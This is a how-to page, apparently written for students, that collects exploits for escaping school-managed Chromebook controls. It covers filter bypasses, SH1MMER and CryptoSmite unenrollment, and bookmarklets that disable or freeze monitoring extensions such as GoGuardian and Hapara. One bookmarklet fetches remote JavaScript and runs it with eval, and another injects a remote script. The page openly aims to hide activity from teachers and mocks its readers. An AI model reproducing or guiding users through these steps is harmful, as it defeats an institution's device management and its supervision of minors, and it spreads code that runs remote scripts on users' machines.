<pre><code class="language-js">let warning = "The top and bottom of the site is chopped off. The bottom can be fixed by going fullscreen. The top will always be chopped off though. That is why this exploit might be annoying."
</code></pre>
<p>Also, remember that you can use the arrow keys on your keyboard to go back and forward pages.</p>
<h2 id="method-1">Method 1</h2>
<p>If you didn't see the start, just note that you need the IPSD email of someone else (you don't need the password or anything else). If you don't have this or want to do it faster, use Method 2. Method 1 will be unblocked for a long time (I think).</p>
<ol>
<li>Go to chrome://chrome-signin</li>
<li>Put in the IPSD email</li>
<li>Press "Students: I Forgot My Password"</li>
<li>Press the blue "Click here"</li>
<li>Click on the link in the first step in the website (says "Parent will visit ParentVUE at" and the link)</li>
<li>Scroll and press "Android App"</li>
<li>At the very top right you will see a little thingy that looks like that, click it and type "Google"
<br> <img style="width:200px !important;" src="./assets/search.png" alt="Search thing"></li>
<li>Choose the first one</li>
<li>Go to the "Data safety" section and press on "See details"</li>
<li>Scroll to the very bottom and click on <code class="normlcode">privacy policy</code></li>
<li>Scroll to the very bottom and press "Google"</li>
</ol>
<p>You are done. Now you are in Google. The only benefit of this method is that it's not gonna be blocked for some time.</p>
<h2 id="method-2">Method 2</h2>
<ol>
<li>Go to chrome://chrome-signin</li>
<li>Put in "<a href="mailto:google@d11.org">google@d11.org</a>"</li>
<li>Press "Sign-in options"</li>
<li>Press "Sign in with GitHub"</li>
<li>Press "Forgot password?" (YOU NEED TO DO THIS)</li>
<li>Press the GitHub cat at the top.</li>
<li>Press the search thing (top right) and type in <code class="normlcode">doxrjig</code> and press the first thing that comes up.</li>
</ol>
<p>You are done. Press on any of the links or if you have a specific link you need to get to, use the specific site switcher (don't forget https:// in front of the URL)</p>
<h2 id="method-3-shortest-to-perform-best">Method 3 (shortest to perform, best)</h2>
<ol>
<li>Go to <code class="normlcode">chrome://chrome-signin</code></li>
<li>Type in someone else's email, ex. <code class="normlcode">[email protected]</code></li>
<li>When it takes you to the log-in page, type in YOUR credentials</li>
<li>After pressing enter on the password, it should return you to a 404 page, click the google logo, it should take you to a google page. </li>
<li>This is the unblocked browser. Profit =)</li>
</ol>
<h1 id="ipsd-pass">IPSD-pass</h1>
<p>This method uses a few links in IPSD's login screen to get to a different page unblocked.</p>
<blockquote>
<p>This bypass isn't very good since you can't use the arrow keys to go back and forward in pages, and some sites like Snapchat are still blocked, but that literally can't be bypassed.</p>
</blockquote>
<p>Steps:</p>
<ol>
<li>Log out</li>
<li>You should see "add a new user" on the bottom left, click on that.</li>
<li>In the login screen, press "Students: I Forgot My Password"</li>
<li>Click the blue "Click here" in the sentence that says <code class="normlcode">Click here for step-by-step instructions on using this form.</code></li>
<li>You will find a sentence that says <code class="normlcode">Parent will visit ParentVUE at https://il-ipsd-psv.edupoint.com/PXP2_Login_Parent.aspx and log in with their ParentVUE username/password.</code>, click on the link (should bring you to StudentVUE)</li>
<li>Press "iPhone App"</li>
<li>Press on the search button (top right) and type in "DuckDuckGo," you'll find a thing that says "DuckDuckGo Private Browser," click on it.</li>
<li>You'll find a section that says "App Privacy," and in that you'll find a link that says "For more information, see the developer’s privacy policy." Click on it</li>
<li>You'll find an icon on the top left, click on it</li>
</ol>
<p>Now you are done. Use DDG like how you use Google, but remember that once you click on a site you can't go back because this exploit is bad.</p>
<h1 id="evil-printer-unblocking">Evil Printer Unblocking</h1>
<h3 id="this-method-can-unblock-your-chromebook-and-all-it-takes-is-printing">This method can unblock your chromebook, and all it takes is printing.</h3>
<br>
<blockquote>
<p>The only problem with this is that there will be a little bit of lag while this is running. This exploit may randomly stop working, just do the entire thing again.</p>
</blockquote>
<ol>
<li>DON'T CLICK ON THIS LINK (it won't work). Instead, drag this link to your tabs, and a lot of code should pop up.</li>
</ol>
<p>Link: <a target="_blank" href="chrome-extension://adkcpkpghahmbopkjchobieckeoaoeem/main.js" id="myLink">Drag me!</a></p>
<p>Ex:
<br>
<img src="./assets/drag.gif"></p>
<ol start="2">
<li>Press CTRL+P to bring up the printing page. Set pages to "All" and Layout to "Landscape." Also, copy these settings down below as well. This will create a lot of lag, and you won't be able to open sites right now.</li>
</ol>
<img style="width: 300px;" src="./assets/idk.png">
<p><strong>Make sure that you copied all of those settings.</strong></p>
<ol start="3">
<li><p>Press the refresh button on your chromebook's keyboard (don't close that printing screen), then do ALT + D and ALT + Enter. There should be a new tab that opens; don't close this tab! Going on that tab is a bad idea too since it can lag you. </p>
</li>
<li><p>Copy this URL, open a new tab, and paste it in the same place you would paste a normal URL in.</p>
</li>
</ol>
<p><code class="normlcode">chrome://extensions/?id=adkcpkpghahmbopkjchobieckeoaoeem</code></p>
<ol start="5">
<li><p>Scroll down until you see <code class="normlcode">Allow access to file URLs</code> and flip the switch thing next to it, and then do it again so the switch isn't blue anymore.</p>
</li>
<li><p>If you did everything correctly, the old page closed but the new page is still open and it is still loading. Now your chromebook should be unblocked. You will feel a bit of lag but that's it. If you want to stop the exploit and go back to normal without lag, just enter <code class="normlcode">chrome://restart</code> in the place where you type URLs, and your chromebook will immediately restart.</p>
</li>
</ol>
<h1 id="ltvegan">LTVegan</h1>
<blockquote>
<p>Hang the blocker and be unblocked.</p>
</blockquote>
<ol>
<li>Open <code class="normlcode">chrome://extensions/?id=adkcpkpghahmbopkjchobieckeoaoeem</code> (tab 1)</li>
<li>Open <code class="normlcode">chrome-extension://adkcpkpghahmbopkjchobieckeoaoeem/main.js</code> in a new tab (tab 2)</li>
<li>Go to tab 2 and do CTRL + A to copy all of the code on the site.</li>
<li>Drag the code to the top (this might do a google search with all of the code, that's fine). The chromebook will freeze for a little bit.</li>
<li>Right-click on tab 1 once you stop freezing and press the duplicate button.</li>
<li>Go to tab 2 and press the switch that says "Allow access to file URLs" (multiple times). One of the tabs that were duplicated will close, the other won't. DON'T CLOSE THE TAB THATS LOADING.</li>
<li>close the google tab, and close tab 1, and you should be unblocked!</li>
</ol>
<p>If BOTH tabs of tab 2 (the original and duplicated) close, you did something wrong probably. Just try again or something. (Unless it's patched lol)</p>
<h2 id="cryptosmite-unenrollment">CryptoSmite <em>Unenrollment</em></h2>
<p><strong>CryptoSmite</strong> is an exploit capable of completely unenrolling enterprise-managed Chromebooks. It was found by FWSmasher and released on <strong>March 9th, 2024</strong>.</p>
<p><strong>This exploit has been patched since Chrome OS 120.</strong></p>
<h3 id="finding-kernver">Finding Kernver</h3>
<p>If you're on v120 or higher, you need to downgrade in order to use CryptoSmite. To do this, you first need to check your <code class="normlcode">kernver=</code> in Recovery Mode.</p>
<ol>
<li>Boot into Recovery Mode<ul>
<li>Hold ESC + Refresh + Power for 2 or 3 seconds.</li>
<li>You should be on an "Insert Recovery Media" or "Let's step you through the recovery process" screen.</li>
</ul>
</li>
<li>Press TAB and look at the last digit of the <code class="normlcode">kernver=</code> line</li>
</ol>
<ul>
<li><p><code class="normlcode">kernver=</code> ends with a 2! <br />
Congratulations, you can downgrade to v119 or lower! Follow the instructions at <a href="#downgrading-change-versions">Downgrading <em>Change versions</em></a> on how to downgrade.</p>
</li>
<li><p><code class="normlcode">kernver=</code> ends with a 3! <br />
Sorry, you can't downgrade to v119 or lower. Wait for a new unenrollment exploit or do a <a href="https://blog.darkn.bio/blog/3-the-tsunami"><strong>dangerous</strong> hardware modification.</a></p>
</li>
</ul>
<h3 id="using-cryptosmite">Using CryptoSmite</h3>
<ol>
<li>Download a SH1MMER Prebuilt image here: <a href="https://dl.darkn.bio/SH1mmer/Prebuilt/">dl.darkn.bio</a></li>
<li>Disable OS verification <em>(blocked or not, doesn't matter)</em>, and boot into the shim.</li>
<li>Navigate to Payloads and navigate to CryptoSmite using the arrow keys, then press <code class="normlcode">Enter</code>.</li>
<li>Type in <code class="normlcode">Y</code> then press enter, and it'll automatically reboot upon completion.</li>
<li>Proceed through the setup partially till you get to the Add Account Screen.<ul>
<li>If you see an update prompt, reboot then press <code class="normlcode">CTRL + ALT + E</code> on the Wi-Fi screen.<ul>
<li>This <em>should</em> allow skipping the update, or make it not appear at all.</li>
</ul>
</li>
</ul>
</li>
<li>Powerwash the Chromebook at the "Add Account" screen. Afterwards, it'll be fully unenrolled.</li>
</ol>
<h3 id="further-reading">Further Reading</h3>
<ul>
<li><a href="https://github.com/FWSmasher/CryptoSmite">Repository</a> </li>
<li><a href="https://blog.coolelectronics.me/breaking-cros-2/">Writeup</a></li>
<li><a href="https://exploitingchromium.blogspot.com/">Official Blogspot</a></li>
</ul>
<h2 id="sh1mmer-unenrollment">SH1MMER <em>Unenrollment</em></h2>
<p><strong>SH1MMER</strong> is an exploit capable of completely unenrolling enterprise-managed Chromebooks. It was found by the Mercury Workshop team and was released on <strong>January, Friday the 13th, 2023</strong>.</p>
<p>Due to the detail this exploit requires, please check out the offical website: <a href="https://sh1mmer.me">sh1mmer.me</a></p>
<p><strong>This exploit has been patched since Chrome OS 111.</strong></p>
<h3 id="note">Note</h3>
<p>Mercury Workshop received a notice from Google™️ that they had to take down their builder and shims. Currently, it is being rehosted by multiple community members.</p>
<ul>
<li><a href="https://darkn.bio/sh1mmer/builder">Wax4Web</a></li>
<li><a href="https://dl.darkn.bio/SH1mmer">RMA shims</a></li>
<li><a href="https://dl.darkn.bio/SH1mmer/Prebuilt">Prebuilt shims</a></li>
</ul>
<h3 id="further-reading-1">Further Reading</h3>
<ul>
<li><a href="https://github.com/MercuryWorkshop/sh1mmer">Repository</a> </li>
<li><a href="https://sh1mmer.me/">Official Website</a></li>
<li><a href="https://blog.coolelectronics.me/breaking-cros-2/">Writeup</a></li>
</ul>
<h2 id="hapara-focus-session-bypass">Hapara Focus Session Bypass</h2>
<h3 id="what-is-it">What is it?</h3>
<p>An exploit that allows for access to sites outside of the Hapara Focus Session</p>
<h3 id="how-to-use-it">How to use it?</h3>
<p><strong>You teacher may be able to still see your screen, but they won't think you are doing anything wrong because of the focus session.</strong></p>
<p><strong>YOU MUST NEED data: LINKS ALLOWED, IF YOU DON'T HAVE THOSE ALLOWED, THIS WILL NOT WORK</strong>.</p>
<ol>
<li>create a bookmark named anything, head to the URL section, and paste this in it: <code class="normlcode">data:text/html,<!DOCTYPE html> <html> <head> <title>full screen iframe</title> <style type="text/css"> html { overflow: auto; } html, body, div, iframe { margin: 0px; padding: 0px; height: 100%; border: none; } iframe { display: block; width: 100%; border: none; overflow-y: auto; overflow-x: hidden; } </style> </head> <body> <iframe src="https://www.google.com.au" frameborder="0" marginheight="0" marginwidth="0" width="100%" height="100%" scrolling="auto" id="google"> </iframe> </body> </html></code></li>
<li>when you are in a focus session, click the bookmark, and it will open a google tab. (If it says that it doesn't work, then you can download the <a href="./assets/HaparaBypass-Iframe.html">Iframe</a></li>
<li>enjoy not having to listen to a lecture from your teacher!
(Credit to <a href="https://github.com/HeroLink6">Hero Link 6</a> For finding this exploit, you can find more info on his GitHub repository <a href="https://github.com/HeroLink6/Hapara-Focus-Session-Bypass/tree/main">here</a>.)</li>
</ol>
<h2 id="guardiantabcrash-unrestricted-browsing">GuardianTabCrash <em>Unrestricted browsing</em></h2>
<h3 id="what-is-it-1">What is it?</h3>
<p>An exploit that allows for unrestricted internet access outside of goguardian's control</p>
<h3 id="how-to-use-it-1">How to use it?</h3>
<p><strong>Teacher's can still see your screen, but they can't block or close any of your tabs.</strong></p>
<p><strong>YOUR TEACHER NEEDS TO HAVE SET A TAB LIMIT. TRY OPENING TONS OF TABS TO CONVINCE THEM TO ENABLE TAB LIMITS</strong>.</p>
<ol>
<li>create a bookmark named anything: <code class="normlcode">javascript: window.onbeforeunload = ()=>{return false;}</code></li>
<li>Hold down CTRL and then SPAM CLICK the bookmark until you're well above the tab limit, opening a bunch of <code class="normlcode">about:blank</code> pages.</li>
<li>It might ask if you want to leave this page, this is goguardian trying to close it. Say No, and click <code class="normlcode">Prevent from creating additional dialogues</code>.</li>
<li>Enjoy your unblocked stay!</li>
</ol>
<h4 id="discovered-by-py660">Discovered by @py660</h4>
<h2 id="skiovox-unrestricted-browsing">Skiovox <em>Unrestricted browsing</em></h2>
<h3 id="what-is-it-2">What is it?</h3>
<p>An exploit that allows for browsing within a completely unblocked Chrome
browser. It works on ChromeOS 118 and a wide range of previous versions.</p>
<ul>
<li>Skiovox utilizes a bug in kiosk apps</li>
<li>Very similar to a bug from 3 years ago
Within the unblocked browser, you can</li>
<li>Install extensions</li>
<li>Bypass pretty much all blocks</li>
<li>Do whatever the honk you want</li>
</ul>
<h3 id="how-to-use-it-2">How to use it</h3>
<p>Bypassi made a wonderful slideshow for you goofballs to follow and view using any of the links below!</p>
<ul>
<li><a href="https://www.skiovox.com/skiovox.pdf">https://www.skiovox.com/skiovox.pdf</a></li>
<li><a href="https://drive.google.com/file/d/1tl8eP26MFRejHO38H5HwMLl2VaQrtn0Z/preview">https://drive.google.com/file/d/1tl8eP26MFRejHO38H5HwMLl2VaQrtn0Z/preview</a></li>
<li><a href="https://ftp.3kh0.net/Archive/skiovox.pdf">https://ftp.3kh0.net/Archive/skiovox.pdf</a></li>
<li><a href="https://1drv.ms/b/s!Ais5N3vPLTEMh8poZbywnNWdMUrhUA?e=MaCHBx">https://1drv.ms/b/s!Ais5N3vPLTEMh8poZbywnNWdMUrhUA?e=MaCHBx</a></li>
<li><a href="./assets/skiovox.pdf"><code class="normlcode">assets/skiovox.pdf</code></a></li>
</ul>
<h3 id="further-reading-2">Further Reading</h3>
<ul>
<li><a href="https://github.com/bypassiwastaken/skiovox-helper">Skiovox helper</a></li>
</ul>
<h2 id="ltbeef-disable-extensions">LTBEEF <em>Disable extensions</em></h2>
<p>LTBEEF (Literally The Best Exploit Ever Found) is an exploit found by Bypassi (Bypassi#7037) in September 2022 and is a great way to disable spyware installed on your Chromebook by your school.</p>
<h3 id="how-to-use-ltbeef">How to use LTBEEF</h3>
<p>Use either of the two bookmarklets below. The instructions are the same for both.</p>
<ol>
<li>Copy the Javascript code from either of the two bookmarklets below</li>
<li>Make a new bookmark on your Chromebook</li>
<li>Put the Javascript code in the URL section of the bookmark</li>
<li>Visit <a href="https://chrome.google.com/webstorex">https://chrome.google.com/webstorex</a>. (This is a 404 page, and that is ok.)</li>
<li>If that page does not work, you can just change the end of the URL to anything else, like <a href="https://chrome.google.com/webstoreYAAAAAAAAAAAAAAAY">https://chrome.google.com/webstoreYAAAAAAAAAAAAAAAY</a></li>
<li>Click on the bookmark you made</li>
<li>Switch off the extensions you don't want to have anymore.</li>
<li>You're done! The extension should now be disabled.</li>
</ol>
<p><strong>Please note that this exploit has been patched for quite some time</strong></p>
<h3 id="bookmarklets">Bookmarklets</h3>
<h4 id="compactcow-gui">CompactCow GUI</h4>
<p><img src="./assets/compactcow.png" alt="compactcowgui"></p>
<pre><code class="language-js">javascript:fetch(`https://compactcow.com/ltbeef/exploit.js`).then(data=>{data.text().then(text=>{eval(text)})});
</code></pre>
<h4 id="ingot">Ingot</h4>
<p><img src="./assets/ingot.png" alt="ingot"></p>
<pre><code class="language-js">javascript:(function () {var a = document.createElement('script');a.src = 'https://cdn.jsdelivr.net/gh/FogNetwork/Ingot/ingot.min.js';document.body.appendChild(a);}())
</code></pre>
<h2 id="lomoh-disable-extensions">LoMoH <em>Disable extensions</em></h2>
<p>Formerly named "Locked Mode Hack," this Chrome OS exploit uses the locked mode feature to soft disable force-enabled extensions on managed accounts (Excluding Hapara Highlights and Read&Write if installed).</p>
<p><strong>This exploit is patched in Chrome OS 111</strong></p>
<h3 id="bookmarklet-version-original-and-nicer">Bookmarklet Version (Original and nicer)</h3>
<pre><code class="language-js">javascript:(function(){if (location.hostname == "docs.google.com") {document.body.innerHTML = document.body.innerHTML.replace("Locked mode is on", "Are you ready to turn off extensions?%22);%20document.body.innerHTML%20=%20document.body.innerHTML.replace(%22You%20have%20already%20opened%20and%20closed%20this%20quiz.%20Opening%20this%20quiz%20again%20will%20notify%20the%20form%20owner%20by%20email.%22,%20%22This%20will%20reload%20all%20tabs%20in%20your%20browser%22);%20var%20button%20=%20document.getElementById(%27mG61Hd%27);%20button.innerHTML%20=%20button.innerHTML.replace(%22Start%20Quiz%22,%20%22Disable%20Extensions%22);%20button.addEventListener(%27click%27,%20function(event){window.close();})}%20else%20{window.open(%22https://docs.google.com/forms/u/0/d/e/1FAIpQLSf5EYwrSUjmQhBOasMpORZy80eBCYb7qCpEwWNoRPUGyObGMA/startquiz%22);}})()
</code></pre>
<h3 id="websitehtml-version-for-blocked-bookmarklets">Website/HTML Version (for blocked bookmarklets)</h3>
<p><a href="https://ashtondavies.github.io/LoMoH?unlock">LoMoH HTML</a>
<strong>Additional Notes:</strong>
You must create your link with the button on the page for locked mode to work within your organization/district.
If this is patched for you, you will get rickrolled attempting to perform this exploit. This is just a heads-up for those who do happen to read this.</p>
<p><a href="https://github.com/AshtonDavies/LoMoH">GitHub Repository</a></p>
<h2 id="ltmeat-disable-extensions">LTMEAT <em>Disable extensions</em></h2>
<p><strong>L</strong>iterally <strong>T</strong>he <strong>M</strong>eatiest <strong>E</strong>xploit of <strong>A</strong>ll <strong>T</strong>ime</p>
<ol>
<li>Find a page belonging to the extension you want to disable. <code class="normlcode">chrome://extensions</code>, <code class="normlcode">chrome://extensions-internals</code>, and <code class="normlcode">chrome://process-internals</code> are all good places to find your extension's ID (a 32-character lowercase string). You can also do a simple Google search. Once you have your ID, substitute it into the hostname in the URL below:</li>
</ol>
<pre><code class="normlcode">chrome-extension://extensionidhereblahblah/manifest.json
</code></pre>
<p>For some filters like Securly, the block screen is already an extension page. </p>
<ol start="2">
<li>Bookmark the extension page (bookmark A) if you wish. Then, bookmark <code class="normlcode">chrome://kill</code> (B) and <code class="normlcode">chrome://hang</code> (C). </li>
<li>On the extension page (A), click the <code class="normlcode">chrome://kill</code> bookmark (B). The page should crash. You should already have the next step prepared. </li>
<li>Instantly start spamming <code class="normlcode">chrome://hang</code> (bookmark C) and quickly reload the page while spamming (ideally with the refresh key on your keyboard or <code class="normlcode">ctrl</code>+<code class="normlcode">R</code>). You should have reloaded within one or two seconds of killing the page. </li>
<li>If the extension page (bookmark A) no longer loads, then LTMEAT worked! You can close your tabs, and the extension will be dead. If nothing loads, you probably reloaded too late or spammed too slowly. This isn't rocket science! Restart your computer to revert back to normal.</li>
</ol>
<p>Exploit made by <a href="https://buymeacoffee.com/bypassi">Bypassi#7037</a>, <a href="https://ltmeat.bypassi.com">learn why this works</a>.</p>
<h3 id="help-me-im-an-idiot">"Help me! I'm an idiot!"</h3>
<p>I had far too much faith in society when making this page. Some of you skids out there are really, really stupid and also can't read. So here are the answers to some commonly asked questions. </p>
<p><strong>How do I get an extension ID?</strong></p>
<p>Okay, fair. Extension IDs are leaked in a couple of places. Generally, the best way to get them is to go to extension settings and copy the URL query value.</p>
<p><strong>It says blocked by client?</strong></p>
<p>That's the message you get when you try to visit a page belonging to an extension that doesn't exist. The error message (<code class="normlcode">ERR_BLOCKED_BY_CLIENT</code>) is highly misleading. Nobody blocked it. You need to find the correct extension ID (see above).</p>
<p>If you got this because you tried to visit the <code class="normlcode">extension_id_here</code> example URL, you should be extremely ashamed of yourself. Please change and grow as a person.</p>
<p><strong>I don't have a bookmarks bar!!!!</strong></p>
<p>First, try running ctrl+shift+B. If that doesn't work, go to <code class="normlcode">chrome://settings</code> and turn on the "home button" feature, then set it to <code class="normlcode">chrome://hang</code>. A home icon in the top left should appear to the right of your refresh icon. Use that instead of bookmark C.</p>
<p>There is a version where you don't need bookmarklets, but I am currently gatekeeping it (L). Check this site daily to see if new alternate instructions have been posted. </p>
<p><strong>I disabled an extension, but now I can't load websites!</strong></p>
<p>If you just read the write-up, you'd know this would happen if the extension's background page loaded and its listeners were already initialized before you used <code class="normlcode">chrome://hang</code>. You can double-check whether the extension is listening using <code class="normlcode">chrome://extensions-internals</code>, assuming you have a few brain cells in your head.</p>
<p>Anyway, no listeners mean you were too slow. Either you waited more than three seconds between bookmark B and reloading the page, or you needed to be spamming bookmark C faster. The most reliable fix is to restart your computer and try again. Try to match the pace of the gif below: (note the reload) </p>
<p><img src="./assets/abc.gif" alt="image"></p>
<p><strong>The bookmarks don't do anything when I click them!</strong></p>
<p>Might be admin-blocked. Either be smart enough to figure out another way or check this site daily to see if new alternate instructions have been posted.</p>
<p><strong>I disabled the extension. Why is some stuff still blocked?</strong></p>
<p>I have bad news for you... not all filters are Chrome Extensions. Again, make sure the extension pages (like bookmark A) are frozen before you assume that your skiddy self successfully did the exploit. </p>
<p><a href="https://ltmeat.bypassi.com/alt/1.txt">Baby method for slow people</a></p>
<h2 id="ltmeat-flood-freeze-extensions">LTMEAT Flood <em>Freeze extensions</em></h2>
<ol>
<li>Create a bookmark folder and paste the extension page many times. (About 800 minimum is recommended, assuming your Chromebook is average school quality) You should add the extension page at the beginning of the folder.</li>
<li>Right-click and open all in a new window.</li>
<li>Close the window with all those tabs.</li>
<li>Open the folder in a new window again, and Chrome should hang those tabs to take care of the old ones in the background that were just closed. (Equivalent to the duplicate tab step in Bypassi's method)</li>
<li>Flip the Allow access to file URLs switch in the extension settings, and then you've bypassed the patch, and the exploit is working.</li>
</ol>
<p>Close everything and you're good to go. If it didn't work, try adjusting the number of open tabs. This is the LTMEAT Flood Method, and also unofficially called Alternate Method # 2. Enjoy a much longer life of LTMEAT!</p>
<p><strong>Not working?</strong> Ensure you open a large set, but not too large, of extension tabs (_/generated_background_page.html or /manifest.json) for a permanent freeze.</p>
<h2 id="temp-tmeat-freeze-extensions">Temp TMEAT <em>Freeze extensions</em></h2>
<p>A method of using LTMEAT that does not require <code class="normlcode">chrome://</code> URLs. This works by using 80-150 tabs to soak up memory.</p>
<ol>
<li>Create a bookmark with the link <code class="normlcode">chrome://extensions/?id=extension_id_here</code> and name it <code class="normlcode">Kill switch</code>.</li>
<li>Create a new bookmark folder. Name it <code class="normlcode">spam.js</code>. Next, paste this link into your browser: <code class="normlcode">chrome-extension://extension_id_here/background.js</code></li>
<li>Then right-click on your folder and hit <code class="normlcode">Add Page</code>. Press Enter.</li>
<li>Right-click on the folder again and hit <code class="normlcode">Bookmark Manager</code>. You should see your page. Click on it and hit <code class="normlcode">Ctrl</code>+<code class="normlcode">C</code>. Press <code class="normlcode">Ctrl</code>+<code class="normlcode">V</code> until you have 38 of them.</li>
<li>Go to a new tab and right-click your folder. Press <code class="normlcode">Open All (38)</code>.</li>
<li>Repeat step 3, then click on one of the tabs from this batch. Wait until the <code class="normlcode">This page is taking too long</code> popup appears. This will take 30-60 seconds. If it doesn’t, do <code class="normlcode">chrome://restart</code> and go back to step 2. Add 3-4 more pages to the folder.</li>
<li>Once the popup happens, right-click on one of the tabs closest to the right of the screen and hit <code class="normlcode">Duplicate</code>. Then, go to your <code class="normlcode">Kill switch</code> bookmark and look for a switch to flip, <code class="normlcode">Allow Access to File:// urls</code>. Then, click on the leftmost extension tab (one that opened from the main.js folder) and click <code class="normlcode">Close all tabs to the right</code>. KEEP THIS TAB OPEN!!!</li>
</ol>
<p>Tips: Go to <code class="normlcode">chrome://settings/performance</code> and turn Memory Saver off, and in the box where it says <code class="normlcode">Keep these sites always active</code>, paste in the extension URL. I’ve noticed clicking on one of the tabs from the second batch seems to help with reliability.</p>
<h2 id="baby-ltmeat-freeze-extensions">Baby LTMEAT <em>Freeze extensions</em></h2>
<p>BABY METHOD
FOR THE TECHNOLOGICALLY CHALLENGED.</p>
<ol>
<li>Follow step one of the original instructions to find a page belonging to the Chrome extension you want to disable.</li>
<li>Visit that <code class="normlcode">chrome-extension://extension_id_here</code> page, then type <code class="normlcode">chrome://hang</code> in the URL bar of that tab. It should start loading infinitely.</li>
<li>Right-click the tab and duplicate it. Don't close anything.</li>
<li>Go to the <code class="normlcode">chrome://extensions</code> page for the blocker extension you want to Disable.</li>
<li>If that page has any switch, such as <code class="normlcode">Allow access to file URLs</code>, click that switch. If you don't see any clickable switches, this exploit will not work</li>
<li>The extension should now be broken, assuming you clicked the switch! Only one of the two duplicate tabs should be left standing. You can close your tabs now.</li>
</ol>
<h2 id="ltmeat-print-freeze-extensions">LTMEAT Print <em>Freeze extensions</em></h2>
<ol>
<li>Find your extension's largest file. This can usually be found by using <a href="https://robwu.nl/crxviewer/">Rob Wu's crxviewer</a></li>
<li>Go to that page and run <code class="normlcode">Ctrl</code>+<code class="normlcode">P</code>. A print window should show up, with several pages in the top right.</li>
<li>Do everything you can to increase that number. Shrink down margins, change layout to landscape, anything you can. The higher you get that number, the longer the effect will last.</li>
<li>Reload. The page should start hanging.</li>
<li>Go to your extension's settings page, <code class="normlcode">chrome://extensions</code>.</li>
<li>Duplicate your "printing" tab, and go back to your extension's settings page.</li>
<li>Flip any switch you can find there. Usually, there'll be one titled <code class="normlcode">Allow access to file URLs</code>.</li>
</ol>
<h3 id="where-do-i-find-my-extensions-manifestjson">Where do I find my extension's manifest.json?</h3>
<p>First, find your extension's ID. This is a 32-character code found on your extension's settings page, normally near or at the top. </p>
<p><img src="./assets/find_ext_id.png" alt="Where do I find my extension ID"></p>
<p>Then go to <code class="normlcode">chrome-extension://extension_id_here/manifest.json</code></p>
<p>Credit to Bypassi for the original LTMEAT framework, and to Swordmaster4321 for discovering that pages can be hung with printing.</p>
<h2 id="dextensify-freeze-extensions">Dextensify <em>Freeze extensions</em></h2>
<p>Dextensify is an exploit that lets you disable most admin-installed Chrome extensions from any webpage. It can be used from regular websites, HTML files, and data URLs.</p>
<p>Go here and follow instructions: <a href="https://dextensify.pages.dev/main">Dextensify Main HTML</a>, or download the file here <a href="Dextensify.html">Dextensify.html</a></p>
<p>Download mirror: <a href="https://ftp.3kh0.net/Archive/Dextensify/">ftp.3kh0.net</a></p>
<p>Made by <a href="https://ading.dev/">ading2210</a></p>
<h2 id="jpcmg-ltbeef-w-service-workers">JPCMG <em>LTBEEF w/ Service workers</em></h2>
<p><strong>Requirements</strong></p>
<ul>
<li><code class="normlcode">chrome://serviceworker-internals</code></li>
<li>Inspect element</li>
</ul>
<ol>
<li>Go to <code class="normlcode">chrome://serviceworker-internals</code></li>
<li>Find your extension, this exploit will not work if you can't find it. Some extensions will not work with this exploit.</li>
<li>Hit the start button then the <code class="normlcode">Inspect</code> button, and execute the LTBEEF code</li>
</ol>
<pre><code class="language-js">chrome.management.setEnabled('extension_id_here',false)
</code></pre>
<p><img src="./assets/jpcmg.png" alt="Screenshot example"></p>
<p>Thanks to Nyaann#3881 for this exploit</p>
<h2 id="corkey-corrupt-extensions">Corkey <em>Corrupt extensions</em></h2>
<p>Corkey does indeed include power washing the Chromebook, which wipes local data including everything under "My files," so I suggest you select everything you want to drag and back up to Google Drive if that's available for your account.</p>
<ol>
<li>Esc+Refresh+Power and re-enroll (Enter recovery page), or you can just powerwash.</li>
<li>Log into your Chromebook and immediately turn off WiFi and do refresh+power to (instant restart)</li>
<li>Log back into your Chromebook with the WiFi off. Look for an option to log in as an existing user and click that.</li>
<li>Go to <code class="normlcode">chrome://extensions</code>, turn on WiFi, and wait for your school's blocking extension to appear.</li>
<li>As soon as it appears, turn off WiFi and restart as fast as possible.</li>
<li>Log back in, go back to extensions, and wait. If it says your blocking extension could be corrupted or doesn't appear at all, then it worked (wait at least a minute with a close watch in case it comes back)</li>
<li>If it didn't work, start over. You have to be fast.</li>
</ol>
<h2 id="extension-launcher-install-extensions-wo-allowlist">Extension Launcher <em>Install extensions w/o allowlist</em></h2>
<p>A bookmarklet capable of installing extensions, for those without an allowlist.</p>
<h3 id="requirements">Requirements</h3>
<ol>
<li>Access to the Chrome Web Store</li>
<li>A Chromebook without allowlist</li>
<li>Bookmarklets enabled</li>
</ol>
<h3 id="instructions">Instructions</h3>
<ol>
<li>Go to <a href="./ext-launcher-bookmarklet.js"><code class="normlcode">ext-launcher-bookmarklet.js</code></a> and save the code as a bookmarklet.</li>
<li>Go to <a href="https://chrome.google.com/webstorex">The Chrome Webstore</a> and use the bookmarklet</li>
<li>Then put the icon of the extension, the ID, and the name of it (This does not matter, you can put anything), then press download, and it will work.</li>
</ol>
<h3 id="extra-notes">Extra Notes</h3>
<ul>
<li>Credit to "Aka, but nice" on Discord.</li>
<li>DNS will be up soon for those who have JavaScript bookmarklets blocked.</li>
<li>This will not work if you have a blocklist this is only for if when you go to the web store it shows blocked</li>
</ul>
<h2 id="point-blank-execute-scripts-on-extension-pages">Point-Blank <em>Execute scripts on extension pages</em></h2>
<p>This exploit allows you to execute scripts on extension pages, this is a great example of how Chromebooks are a piece of garbage.</p>
<h3 id="requirements-1">Requirements</h3>
<ol>
<li>Bookmarklets enabled</li>
<li>Access to a working brain</li>
</ol>
<h3 id="getting-started">Getting started</h3>
<ol>
<li>Go to <a href="./newpointblank.js"><code class="normlcode">newpointblank.js</code></a> and save the code as a bookmarklet on your Chromebook.</li>
<li>Now find your blocker from the list below.</li>
</ol>
<h3 id="blockers">Blockers</h3>
<h4 id="securly">Securly</h4>
<p><a href="https://tinyurl.com/bettergoofcurly">Go to this page</a></p>
<p>If it says blocked by Chrome, reload (you have to actually have Securly ofc)</p>
<h4 id="iboss">iBoss</h4>
<p><a href="https://tinyurl.com/goofboss">Go to this page</a></p>
<h4 id="cisco-umbrella">Cisco Umbrella</h4>
<p><a href="https://tinyurl.com/goofumbrella">Go to this page</a></p>
<h4 id="blocksi">Blocksi</h4>
<p><a href="https://tinyurl.com/goofsi">Go to this page</a></p>
<h4 id="goguardian">GoGuardian</h4>
<p><a href="https://tinyurl.com/goofguardian">Go to this page</a></p>
<p>If your school updated GoGuardian, this exploit may not work.</p>
<h3 id="extra-notes-1">Extra Notes</h3>
<ul>
<li>Now most of these links are a block page (this is intentional) </li>
<li>Each page should have a blue link, click the link on the page if it opens a blank page click the bookmarklet that you just made </li>
<li>Click either hard disable or soft disable, soft disable will only disable it until you restart your Chromebook.</li>
<li>You can also run some of the scripts and run your own code, your extension may disable javascript running on it, so running your own code may not work.</li>
